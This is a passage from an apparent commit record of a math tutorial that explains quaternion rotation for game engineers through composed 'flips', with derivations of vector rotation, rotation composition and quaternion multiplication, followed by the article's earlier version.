stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}-\u03c0]._\n\nIt becomes harder to visualize stem:[\\vec{a}] and stem:[\\vec{b}] if we go this way, and the negative sign does not really introduce a lot of difficulties, so we will stick with that negative sign in this article.\n\n****\n---\n\n\n=== Flip Vector\n\nGiven a flip stem:[q_a=(\\vec{a},0)] and vector stem:[\\vec{v}], we are ready to calculate the result of the flip stem:[\\vec{v'}].\n\n.Figure 3\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig3.png[, 400,align=\"center\"]\n\nAccording to flip definition, stem:[\\vec{v}], stem:[\\vec{a}] and stem:[\\vec{v'}] are on the same plane, and the angle stem:[<\\vec{v},\\vec{a}>=<\\vec{a},\\vec{v'}>].\n\nIf we treat stem:[\\vec{v}] and stem:[\\vec{v'}] as the axis of flip stem:[q_v=(\\vec{v},0)] and stem:[q_v'=(\\vec{v'},0)]. From our flip composition rule, flipping along axis stem:[\\vec{v}] then stem:[\\vec{a}] should give us the same rotation as flipping along axis stem:[\\vec{a}] then stem:[\\vec{v'}]. \n\nWe can actually calculate the result rotation. Let stem:[<\\vec{v},\\vec{a}>=<\\vec{a},\\vec{v'}>=\\frac{\u03b8}{2}], stem:[\\vec{u}=\\frac{\\vec{v}\u00d7\\vec{a}}{\\left|\\vec{v}\u00d7\\vec{a}\\right|}=\\frac{\\vec{a}\u00d7\\vec{v'}}{\\left|\\vec{a}\u00d7\\vec{v'}\\right|}]. Then the result rotation is of angle stem:[\u03b8] along axis stem:[\\vec{u}].\n\n[stem]\n++++\n\\begin{align*}\nq&=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})\\\\\n&=-{q_a}{q_v}\\\\\n&=-{q_v'}{q_a}\n\\end{align*}\n++++\n\nThis gives stem:[{q_v'}{q_a}={q_a}{q_v}].\n\n(Here stem:[\\left|\\vec{v}\u00d7\\vec{a}\\right|=\\left|\\vec{a}\u00d7\\vec{v'}\\right|=sin\\frac{\u03b8}{2}].If you are not sure what\u2019s going on here, go back \u201cFlip Composition\u201d and read the proof)\n\nNow we need to introduce the inverse of a quaternion. The inverse of stem:[q] is denoted as stem:[q^{-1}], such that stem:[qq^{-1}=q^{-1}q=(\\vec{0},1)]. \n\nstem:[I=(\\vec{0},1)] is called identity quaternion, means no rotation at all. You can think of stem:[I=(sin\u20610\\vec{v},cos\u20610)], which means rotating stem:[0^{\\circ}] along any axis stem:[\\vec{v}]. We haven\u2019t gone into quaternion multiplication or rotation composition, but it\u2019s not hard to see for any quaternion stem:[q], stem:[qI=Iq=q].\n\nIn the case of unit quaternion, the idea of inversed quaternion is if you apply a rotation, then apply its inverse, the result should be no rotation at all. And it is the same if you apply an inversed rotation then apply the original one.\n\nFor any unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})], then stem:[q^{-1}=(-sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. You can understand this in two ways, either stem:[q^{-1}=(sin\u2061\\frac{\u03b8}{2}(-\\vec{v}),cos\u2061\\frac{\u03b8}{2})] or stem:[q^{-1}=(sin\u2061\\frac{-\u03b8}{2}\\vec{v},cos\u2061\\frac{-\u03b8}{2})]. stem:[q^{-1}] is either a rotation of angle stem:[\u03b8] along axis stem:[-\\vec{v}], or a rotation of angle stem:[\u2013\u03b8] along axis stem:[\\vec{v}]. Either way it will cancel out the original rotation.\n\nI will give a quick proof in the case of flip. You can try extend this proof to general unit quaternion. If stem:[q_a=(\\vec{a},0)], stem:[q_a^{-1}=(-\\vec{a},0)], we have\n\n[stem]\n++++\n{q_a}{q_a^{-1}}=(\\vec{a}\u00d7-\\vec{a},-(\\vec{a}\u00b7-\\vec{a}))=(\\vec{0},1)\n++++\n\n(Make sure you understand the difference between stem:[q^{-1}] and stem:[\u2013q]. Read \u201cFlip Composition\u201d about quaternion negation if you are not sure.) \n\nWe can go back to previous result of flipping vector stem:[{q_v'}{q_a}={q_a}{q_v}]. Apply inverse flip of q_a on both side, the equation becomes\n\n[stem]\n++++\n\\begin{align*}\n{q_v'}{q_a}{q_a^{-1}}&={q_a}{q_v}{q_a^{-1}}\\\\\nq_v'&={q_a}{q_v}{q_a^{-1}}\n\\end{align*}\n++++ \n\nThis provides us a way to calculate the result of flip. Since we only need the vector part of the result, we can denote this as \n\n[stem]\n++++\n\\vec{v'}={q_a}\\vec{v}{q_a^{-1}}\n++++\n\nWhen we put a vector stem:[\\vec{v}] in quaternion multiplication, we are implicitly making that vector the axis of a flip to stuff it into a quaternion stem:[(\\vec{v},0)]. This is how the \u201csandwich\u201d multiplication form comes from, but only in the form of flip. We will prove that our result holds the same for any rotation in the next section.\n\n=== Rotate Vector\n\nWe know any 3D rotation stem:[q] can be broken down into 2 flips stem:[q= -{q_b}{q_a}], which means flipping along stem:[\\vec{a}] first and then stem:[\\vec{b}]. So for a vector stem:[\\vec{v}], we apply the first flip and get\n[stem]\n++++\n\\vec{v'}={q_a}\\vec{v}{q_a^{-1}}\n++++\nThen we apply the second flip stem:[\\vec{v'}] and get\n[stem]\n++++\n\\vec{v''}={q_b}\\vec{v'}{q_b^{-1}}\n++++\nSo the final result is\n[stem]\n++++\n\\begin{align*}\n\\vec{v''}&={q_b}{q_a}\\vec{v}{q_a^{-1}}{q_b^{-1}}\\\\\n&=({q_b}{q_a})\\vec{v}({q_b}{q_a})^{-1}\\\\\n&=(-q)\\vec{v}(-q^{-1})\\\\\n&=q\\vec{v}q^{-1}\\\\\n\\end{align*}\n++++ \nHere you can see why stem:[q= -{q_b}{q_a}] needs to be in this order.\n\nOne thing we need to prove\n[stem]\n++++\n\\begin{align*}\n{q_a^{-1}}{q_b^{-1}}&=(-\\vec{a},0)(-\\vec{b},0)\\\\\n&=(-\\vec{a}\u00d7-\\vec{b},-(-\\vec{a})\u00b7(-\\vec{b}))\\\\\n&=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\\\\\n&=(-\\vec{b}\u00d7\\vec{a},-\\vec{b}\u00b7\\vec{a})\\\\\n&=({q_b}{q_a})^{-1}\n\\end{align*}\n++++ \nAt this point, we fully explained how to rotate a vector using quaternion.\n\n=== Rotation Composition\n\nGiven rotation stem:[q_1] and stem:[q_2], from the formula in the previous section, if we rotate vector stem:[\\vec{v}] by stem:[q_1] first then by stem:[q_2], we have\n[stem]\n++++\n\\begin{align*}\n\\vec{v'}&={q_1}\\vec{v}{q_1^{-1}}\\\\\n\\vec{v''}&={q_2}\\vec{v'}{q_2^{-1}}\\\\\n&={q_2}{q_1}\\vec{v}{q_1^{-1}}{q_2^{-1}}\\\\\n&=({q_2}{q_1})\\vec{v}({q_2}{q_1})^{-1}\\\\\n\\end{align*}\n++++ \nIt is the same as apply the combined rotation stem:[q={q_2}{q_1}]. Be careful about the multiplication order.\n\nAgain we need to prove stem:[{q_1^{-1}}{q_2^{-1}}=({q_2}{q_1})^{-1}], but we will do this later. This equation is actually very easy to understand in geometric term. We have a combined rotation stem:[q={q_2}{q_1}] that rotates stem:[q_1] first then rotates stem:[q_2]. If we want to undo this rotation, which means apply the inverse stem:[q^{-1}={q_2}{q_1^{-1}}], we need to undo stem:[q_2] first then undo stem:[q_1], that is effectively stem:[q_1^{-1}q_2^{-1}].\n\nWhat does it really mean to combine 2 rotations, can we visualize the rotation axis and angle of the result? By converting rotations to flips we actually do that.\n\nLet stem:[q_1=(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})], stem:[q_2=(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})], we need to choose a special flip break down, such that they share one flip: stem:[q_1=-{q_c}{q_a}], stem:[q_2=-{q_b}{q_c}]. \n\nCan we find such a break down? Remember the rule of flip composition requires the flip axis to be perpendicular to the rotation axis, that is stem:[\\vec{c}\u00b7\\vec{v_1}=0], stem:[\\vec{c}\u00b7\\vec{v_2}=0], we can choose stem:[\\vec{c}=\\frac{\\vec{v_1}\u00d7\\vec{v_2}}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}]. \n\nBased on stem:[\\vec{c}] we can find out the other two axes: rotate stem:[\\vec{c}] along axis stem:[\\vec{v_1}] by angle stem:[-\\frac{\u03b8_1}{2}] results in stem:[\\vec{a}]; rotate stem:[\\vec{c}] along axis stem:[\\vec{v_2}] by angle stem:[\\frac{\u03b8_2}{2}] results in stem:[\\vec{b}]. This process is demonstrated in Figure 4.\n\nNow we have stem:[\\vec{a}\u00b7\\vec{v_1}=0], stem:[\\vec{c}\u00b7\\vec{v_1}=0], stem:[<\\vec{a},\\vec{c}>=\\frac{\u03b8_1}{2}] and stem:[\\vec{c}\u00b7\\vec{v_2}=0], stem:[\\vec{b}\u00b7\\vec{v_2}=0], stem:[<\\vec{c},\\vec{b}>=\\frac{\u03b8_2}{2}]. Our break down stem:[q_1=-{q_c}{q_a}], stem:[q_2=-{q_b}{q_c}] is valid. The combined rotation can be written as\n[stem]\n++++\n\\begin{align*}\nq&={q_2}{q_1}\\\\\n&=(-{q_b}{q_c})(-{q_c}{q_a})\\\\\n&={q_b}({q_c}{q_c}){q_a}\\\\\n&=-{q_b}{q_a}\\\\\n\\end{align*}\n++++ \nHere we need to prove this\n[stem]\n++++\n{q_c}{q_c}=(\\vec{c},0)(\\vec{c},0)=(\\vec{c}\u00d7\\vec{c},-(\\vec{c}\u00b7\\vec{c}))=(\\vec{0},-1)=-I\n++++ \nIt shows that the combined rotation can be composed by flip stem:[q_a] and stem:[q_b], which tells the combined rotation is a rotation of angle stem:[2<\\vec{a},\\vec{b}>] along axis stem:[\\vec{u}=\\frac{\\vec{a}\u00d7\\vec{b}}{\\left|\\vec{a}\u00d7\\vec{b}\\right|}].\n\n.Figure 4\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig4.png[, 400,align=\"center\"]\nIn Figure 4, Blue plane is based on stem:[\\vec{v_1}] and stem:[\\vec{v_1}], stem:[\\vec{c}] is perpendicular to that plane. \nOrange plane is based on stem:[\\vec{a}] and stem:[\\vec{b}], the result rotation axis stem:[\\vec{u}] is perpendicular to that plane.\n\nWith the same method, let\u2019s prove the thing we left out:\n[stem]\n++++\n\\begin{align*}\n{q_1^{-1}}{q_2^{-1}}&=(-{q_c}{q_a})^{-1}(-{q_b}{q_c})^{-1}\\\\\n&={q_a^{-1}}{q_c^{-1}}{q_c^{-1}}{q_b^{-1}}\\\\\n&=-{q_a^{-1}}{q_b^{-1}}\\\\\n&=(-{q_b}{q_a})^{-1}\\\\\n&=({q_b}{q_c}{q_c}{q_a})^{-1}\\\\\n&=({q_2}{q_1})^{-1}\\\\\n\\end{align*}\n++++ \n\n=== Summary of Part 1\n\nIn Part 1, we covered the definition of quaternion stem:[q=(x,y,z,w)], the vector form of quaternion stem:[q=(\\vec{v},w)], unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] and how it is used to represent a rotation.\n\nWe also talked about negation of quaternion stem:[\u2013q], and its double cover property; the inverse of quaternion stem:[q^{-1}] and identity quaternion stem:[I=(\\vec{0},1)].\n\nWe use quaternion to represent flip stem:[q_a=(\\vec{a},0)], and derive the rule of flip composition stem:[q=-{q_b}{q_a}]. Based on this rule, we visualized and proved how quaternion rotates a vector by stem:[\\vec{v'}=q\\vec{v}q^{-1}] and how rotation gets composed by stem:[q={q_2}{q_1}].\n\nWe slightly touched quaternion multiplication, and we proved an important equation stem:[{q_1^{-1}}{q_2^{-1}}=({q_2}{q_1})^{-1}].\n\n=== Appendix: Derive Quaternion Multiplication\n\nThis part is not very important for understanding quaternion. It is a bit calculation heavy and is more for fun. Feel free to skip.\n\nWe can actually derive the general quaternion multiplication from this special flip break down. That is if we define flip multiplication stem:[{q_a}{q_b}=(\\vec{a},0)(\\vec{b},0)=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})] directly, we can proof what general quaternion multiplication stem:[{q_1}{q_2}=(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})] would look like.\n\nHere are some equations we will be using:\n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00d7(\\vec{b}\u00d7\\vec{c})&=(\\vec{a}\u00b7\\vec{c})\\vec{b}-(\\vec{a}\u00b7\\vec{b})\\vec{c}\\\\\n(\\vec{a}\u00d7\\vec{b})\u00b7(\\vec{c}\u00d7\\vec{d})&=(\\vec{a}\u00b7\\vec{c})(\\vec{b}\u00b7\\vec{d})-(\\vec{a}\u00b7\\vec{d})(\\vec{b}\u00b7\\vec{c})\\\\\n(\\vec{a}\u00d7\\vec{b})\u00d7(\\vec{a}\u00d7\\vec{c})&=(\\vec{a}\u00b7(\\vec{b}\u00d7\\vec{c}))\\vec{a}\n\\end{align*}\n++++ \n\nRecall how we choose the flip break down stem:[\\vec{c}=\\frac{\\vec{v_1}\u00d7\\vec{v_2}}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}].\n\nRotate stem:[\\vec{c}] along axis stem:[\\vec{v_1}] by angle stem:[-\\frac{\u03b8_1}{2}] we get\n[stem]\n++++\n\\vec{a}=cos\\frac{-\u03b8_1}{2}\\vec{c} + sin\\frac{-\u03b8_1}{2}(\\vec{v_1}\u00d7\\vec{c})=\\frac{1}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}(cos\\frac{\u03b8_1}{2}(\\vec{v_1}\u00d7\\vec{v_2}) - sin\\frac{\u03b8_1}{2}(\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\n++++\nRotate stem:[\\vec{c}] along axis stem:[\\vec{v_2}] by angle stem:[\\frac{\u03b8_2}{2}] we get\n[stem]\n++++\n\\vec{b}=cos\\frac{\u03b8_2}{2}\\vec{c} + sin\\frac{\u03b8_2}{2}(\\vec{v_2}\u00d7\\vec{c})=\\frac{1}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}(cos\\frac{\u03b8_2}{2}(\\vec{v_1}\u00d7\\vec{v_2}) + sin\\frac{\u03b8_2}{2}(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\n++++\nAnd we will have\n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00b7\\vec{b}&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00b7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))))\\\\\n&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00b7\\vec{v_2}){\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2})\\\\\n&=cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00b7\\vec{v_2})\n\\end{align*}\n++++ \n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00d7\\vec{b}&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7\\vec{v_2})\u00d7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\\\\\n&- sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00d7(\\vec{v_1}\u00d7\\vec{v_2})\\\\\n&- sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00d7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))))\\\\\n&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}\\vec{v_2} + sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}\\vec{v_1} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}(\\vec{v_1}\u00d7\\vec{v_2}))\\\\\n&=cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}\\vec{v_2} + sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}\\vec{v_1} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00d7\\vec{v_2})\n\\end{align*}\n++++ \nFrom the previous proof of rotation composition we know stem:[q={q_2}{q_1}=-{q_b}{q_a}], that is \n[stem]\n++++\n\\begin{align*}\nq&=(\\vec{a}\u00d7\\vec{b},\\vec{a}\u00b7\\vec{b})\\\\\n&=(cos\\frac{\u03b8_1}{2}(sin\\frac{\u03b8_2}{2}\\vec{v_2}) + cos\\frac{\u03b8_2}{2}(sin\\frac{\u03b8_1}{2}\\vec{v_1}) - (sin\\frac{\u03b8_1}{2}\\vec{v_1})\u00d7(sin\\frac{\u03b8_2}{2}\\vec{v_2}), cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2} - (sin\\frac{\u03b8_1}{2}\\vec{v_1})\u00b7(sin\\frac{\u03b8_2}{2}vec{v_2}))\n\\end{align*}\n++++ \nwhich is the definition of quaternion multiplication of stem:[{q_1}{q_2}=(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})].\n\n","old_contents":"= An Easy Way to Understand Quaternion and Rotation: Part 1. Theory\nEric Zhang\n\n:stem: latexmath\n:figure-caption!:\n\n\nQuaternion is widely used in game engines to represent 3D rotation. As a game engineer you might be using quaternion explicitly or implicitly in your daily work, but do you really understand what is going on under the hood when you are calling \u201crotate a vector\u201d or \u201ccombine two rotations\u201d? Why rotating a vector stem:[v] by quaternion stem:[q] is calculated by a \u201csandwich\u201d multiplication: stem:[qvq^{-1}] ? Why rotating by quaternion stem:[q_1] then stem:[q_2] is in the reversed order: stem:[{q_2}{q_1}], and can you visualize the result rotation axis and angle?\n\nUnderstanding quaternions also leads to more efficient use of quaternion. For example, one common situation in game development is that we need an object to face its opposite direction. What we usually would do is to get the normal or forward vector, negate it, build a rotation out of it, and assign the rotation to the object. Later in this article we will see how much calculation we need to do in this process. However with the understanding of quaternion, we only need to do stem:[q=(q.y,-q.x,q.w,-q.z)], and I will show you why.\n\nIn this article, I will try to avoid touching the algebra structure of quaternion, or having to imagine a 4 dimensional hyper sphere. I will start with a special rotation operation: flip, and use that to visualize quaternion in a more accessible and geometrical way. This article will be split into 2 parts. In Part 1 we will talk about the idea of quaternion, understand and visualize how it rotates a vector and how to compose rotations. In Part 2 we will talk about how to make use of our understanding in Part 1, and how it is used in game engine versus rotation matrix and Euler angle.\n\nI would assume you are comfortable with 3D math (vector dot product and cross product) and basic trigonometry.\n\n=== Quaternion Definition\n\nQuaternion is a 4-tuple denoted as stem:[q=(x,y,z,w)]. The length of a quaternion is defined as stem:[\\left|q\\right| =\\sqrt{x^{2}+y^{2}+z^{2}+w^{2}}], just as you would expected from a 4D vector. \n\nIn order to represent 3D rotation, we have a constraint on the quaternions we use. But before that I want to introduce Euler\u2019s rotation theorem:\n\n*_Any rotation in 3D space is equivalent to a single rotation of angle stem:[\u03b8] along some axis stem:[\\vec{v}]._*\n\nWe can use quaternion to describe this angle-axis rotation : stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v}.x,sin\u2061\\frac{\u03b8}{2}\\vec{v}.y,sin\u2061\\frac{\u03b8}{2}\\vec{v}.z,cos\u2061\\frac{\u03b8}{2})], or in a more compact form stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. We call this form the vector form of a quaternion, and we will use this form throughout this article. You might be thinking why we are using stem:[\\frac{\u03b8}{2}] other than using stem:[\u03b8] directly. I will explain that in a later section.\n\nIt is easy to see the length of this quaternion stem:[\\left|q\\right|=\\sqrt{sin^{2}\\frac{\u03b8}{2}\\left|\\vec{v}\\right|^{2}+cos^{2}\\frac{\u03b8}{2}}=1]. (Remember the axis stem:[\\vec{v}] is a unit vector that stem:[\\left|\\vec{v}\\right|=1]). We call it a unit quaternion if the length stem:[\\left|q\\right|=1]. So we can rewrite Euler\u2019s rotation theorem in quaternion term:\n\n*_Any 3D rotation is equivalent a unit quaternion stem:[q] that stem:[\\left|q\\right|=1]._*\n\n---\n.Side Note\n****\nThis claim actually has 2 sides. Let me go a little be more in details in math term: \n(1). For any 3D rotation equivalent to a rotation angle stem:[\u03b8] along axis stem:[\\vec{v}], there exists a unit quaternion stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] to describe this rotation. \n(2). For any unit quaternion stem:[q=(x,y,z,w)], it describes a rotation of angle stem:[\u03b8=2cos^{-1}w] along axis stem:[\\vec{v}=\\frac{(x,y,z)}{\\sqrt{1-w^{2}}}].\n\n****\n---\n\nFrom now on, any quaternion stem:[q] used in this article is by default a unit quaternion, and we will use stem:[q] to describe rotations.\n\n=== Rotation and Flip\n\nNow let\u2019s forget quaternion for a minute, and focus on the nature of rotations. This part is the key to understand quaternion calculation in an easier way.\n\n*_Any 3D rotation can be composed by 2 flips along some axes._*\n\nThe reason we want to break down a rotation into flips, is that flips are much easier to think and calculate than general 3D rotation. We will start from flip and build our way to understand rotation.\nHere is a loose proof of this idea. We define counter-clockwise as the positive direction of rotation. First consider a special case. We have a rotation stem:[q], which rotates stem:[+90^{\\circ}] along axis stem:[\\vec{Z}]. Now I can say this rotation is the same as 2 flips along axis stem:[\\vec{a}] and stem:[\\vec{b}], both of them are on XY plane, and the angle from stem:[\\vec{a}] to stem:[\\vec{b}] is stem:[+45^{\\circ}].\n\n.Figure 1 (a)\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig1.png[, 300,float=\"right\",align=\"center\"]\n.Figure 1 (b)\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig1_b.png[, 300,float=\"right\",align=\"center\"]\n\nWe demonstrate this through Figure 1. For any vector stem:[\\vec{v}], the result of this rotation is stem:[\\vec{v''}] , which is the same as flip stem:[\\vec{v}] along axis stem:[\\vec{a}] and get stem:[\\vec{v'}], and then flip stem:[\\vec{v'}] along axis stem:[\\vec{b}] and get stem:[\\vec{v''}]. \n\nIt doesn\u2019t matter where stem:[\\vec{a}] and stem:[\\vec{b}] are on the XY plane, but the order must be kept. If we choose stem:[\\vec{b}] by rotating stem:[\\vec{a}] along axis stem:[\\vec{Z}] by stem:[+45^{\\circ}] with the positive direction we defined above, then we must flip along stem:[\\vec{a}] first then along stem:[\\vec{b}] to get our target rotation. The order and the sign of angle is important, as you can easily see flip along stem:[\\vec{b}] first then along stem:[\\vec{a}] will give a different result.\n\nIt\u2019s not hard to generalize to a rotation of any angle stem:[\u03b8] along stem:[\\vec{Z}] axis. And in this case, the angle from stem:[\\vec{a}] to stem:[\\vec{b}] is stem:[\\frac{\u03b8}{2}].\n\nWhat if the axis is not stem:[\\vec{Z}] axis but any unit vector stem:[\\vec{u}] ? It turns out to be very straight forward. stem:[\\vec{a}] and stem:[\\vec{b}] are no longer on XY plane but on a plane cross the origin and perpendicular to stem:[\\vec{u}], as in Figure 2.\n\n.Figure 2\nimage::https:\/\/github.com\/lxjk\/lxjk.github.io\/raw\/master\/images\/quaternions\/fig2.png[, 400,align=\"center\"]\n\nNow we can rewrite our flip composition rule in a more specific form:\n\n*_Any 3D rotation equivalent to rotating angle stem:[\u03b8] along axis stem:[\\vec{v}] can be represented as a sequence of 2 flips along axis stem:[\\vec{a}] and stem:[\\vec{b}], such that stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}]._*\n\nThis representation means if we fully understand flip, which is easier to visualize, we can fully understand rotation and quaternions, since any quaternion can be broken down to flips.\n\n=== Quaternion and Flip\n\nNow let\u2019s recall the quaternion vector form stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})]. With the discussion of flips above, you can almost immediately see why we are using stem:[\\frac{\u03b8}{2}] here.\n\nThink about flips again. A flip along axis stem:[\\vec{a}] is also a stem:[180^{\\circ}] rotation along axis stem:[\\vec{a}]. So this flip can be represented in quaternion term \n\n[stem]\n++++\nq_a=(sin\u2061\\frac{180^{\\circ}}{2}\\vec{a},cos\u2061\\frac{180^{\\circ}}{2})=(\\vec{a},0)\n++++\n\nFrom now on we will use quaternion to represent flip. Actually any unit quaternion with stem:[q.w=0] is a flip along axis stem:[(q.x,q.y,q.z)].\n\n=== Flip Composition\n\nHere we need to introduce the multiplication of general quaternion. Let stem:[q_1=(\\vec{v_1},w_1)], stem:[q_2=(\\vec{v_2},w_2)] then\n\n[stem]\n++++\n{q_1}{q_2}=(\\vec{v_1},w_1)(\\vec{v_2},w_2)=(w_1\\vec{v_1} + w_2\\vec{v_2} + \\vec{v_1}\u00d7\\vec{v_2}, {w_1}{w_2}-\\vec{v_1}\u00b7\\vec{v_2})\n++++\n\nNote here stem:[q_1] and stem:[q_2] are not necessarily unit quaternion, so even I\u2019m using vector form, there\u2019s no need to put stem:[sin\u2061\\frac{\u03b8}{2}] and stem:[cos\u2061\\frac{\u03b8}{2}] as we did for unit quaternions. It\u2019s hard to explain this definition without introducing the algebra structure of quaternions, so I will skip that. If you are interesting to know how this is derived, quaternion https:\/\/en.wikipedia.org\/wiki\/Quaternion#Definition[Wiki page] has a very straight forward introduction.\n\nWe are not going to use this general quaternion multiplication in Part 1. Here we only need to know a simpler form, the multiplication of flips. Let stem:[q_a=(\\vec{a},0)], stem:[q_b=(\\vec{b},0)] then\n\n[stem]\n++++\n{q_a}{q_b}=(\\vec{a},0)(\\vec{b},0)=(\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\n++++\n\nIt is naturally derived from the general form, and we will be only using this multiplication in Part 1.\n\nWith flip multiplication defined, we can rewrite our flip composition rule again:\n\n*_Any 3D rotation stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})] can be represented as a sequence of 2 flips stem:[q_a=(\\vec{a},0)] and stem:[q_b=(\\vec{b},0)], such that_*\n[stem]\n++++\nq=-{q_b}{q_a}\n++++\n*_where stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and the angle from stem:[\\vec{a}] to stem:[\\vec{b}]: stem:[<\\vec{a},\\vec{b}>=\\frac{\u03b8}{2}]._*\n\nYou might be thinking why it is not stem:[q= {q_a}{q_b}] instead. We will show where the order and the negative sign coming from in the proof.\n\nstem:[\\vec{a}\u00b7\\vec{b}=cos<\\vec{a},\\vec{b}>\\left|\\vec{a}\\right|\\left|\\vec{b}\\right|=cos\\frac{\u03b8}{2}]. Since stem:[\\vec{a}\u00b7\\vec{v}=0], stem:[\\vec{b}\u00b7\\vec{v}=0] and stem:[\\left|\\vec{v}\\right|=1], we have stem:[\\vec{a}\u00d7\\vec{b}=sin<\\vec{a},\\vec{b}>\\left|\\vec{a}\\right|\\left|\\vec{b}\\right|\\vec{v}=sin\\frac{\u03b8}{2}\\vec{v}].\n\nIf you are not sure about the direction of the cross product, see Figure 2.\n\n[stem]\n++++\n\\begin{align*}\nq&=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})\\\\\n&=(\\vec{a}\u00d7\\vec{b},\\vec{a}\u00b7\\vec{b})\\\\\n&=-(-\\vec{a}\u00d7\\vec{b},-\\vec{a}\u00b7\\vec{b})\\\\\n&=(\\vec{b}\u00d7\\vec{a},-\\vec{a}\u00b7\\vec{b})\\\\\n&=-{q_b}{q_a}\n\\end{align*}\n++++\n\nHere you can also clearly see why we are using stem:[sin\u2061\\frac{\u03b8}{2}] and stem:[cos\u2061\\frac{\u03b8}{2}] in quaternions.\n\nOne thing I need to mention here is the negation of a quaternion. stem:[q=(sin\u2061\\frac{\u03b8}{2}\\vec{v},cos\u2061\\frac{\u03b8}{2})], 